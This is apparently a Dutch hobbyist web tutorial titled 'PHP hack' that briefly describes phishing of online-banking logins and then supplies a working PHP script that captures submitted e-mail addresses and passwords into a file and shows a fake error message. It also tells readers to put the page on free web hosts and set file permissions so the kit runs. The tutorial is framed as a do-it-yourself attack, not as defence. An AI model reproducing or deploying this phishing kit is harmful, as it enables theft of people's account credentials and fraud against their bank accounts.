PHP hack (bestand)

In item bespreken we het basisprincipe van 'phishing', ook gaan we een kleine phishing login maken die de gegevens in een bestand plaatst. Phishing is een vorm van internetfraude. Als voorbeeld, online banking. Hackers maken de portaalsite na van een online banking service, ze zorgen ervoor dat jij op die site terecht komt. Vervolgens log je in. Bij de echte portaalsite zou je dan ingelogd zijn, bij een phishing website is dit niet het geval. De gegevens worden echter verstuurd naar de hacker en er verschijnt eventuweel een errorbericht (bv: "Je hebt een foutief paswoord ingevoerd!"). De hacker heeft de gegevens en kan nu op je account betalingen, overschrijvingen, ... verrichten.

Index.html

Plaats deze code tussen de 'body' tags en sla het op als 'index.html'.

index.html kan je op het einde van dit item downloaden

bestand.php

Plaats deze code tussen de 'php' tags.

$email = $_POST['email'];

$paswoord = $_POST['paswoord'];

$fp = fopen("gegevens.html", "a"); // openen

$gegevens = 'E-MAIL: [' . $email . '] 
 PASWOORD: [' . $paswoord . ']

';

fwrite($fp, $gegevens); // gegevens in bestand plaatsen

fclose($fp); // sluiten



echo 'Er is een fout opgetreden, keer terug.';

Hoe gebruiken?

Pas de bovenstaande code aan (bestand.php), je hoeft enkel het e-mail adres te veranderen.
Gebruik hiervoor een free host zoals: gethost.nl; ripway.com; joynick.nl; ...

Wanneer je dit op een eigen webserver plaatst, dan moet je 'gegevens.html' chmod'en naar '777'. Bij ripway.com bijvoorbeeld, is dit niet van toepassing.

Demo

Klik hier voor de Demo.
Vul een e-mail adres in en een paswoord, zodat je de hack zelf kan uittesten.

Download

Er zijn geen berichten geplaatst

Reageer:

Naam:
E-mail adres:
Persoonlijk bericht:

(Maximum karakters: 400). Je hebt nog     karakters over.
 

Validatie code: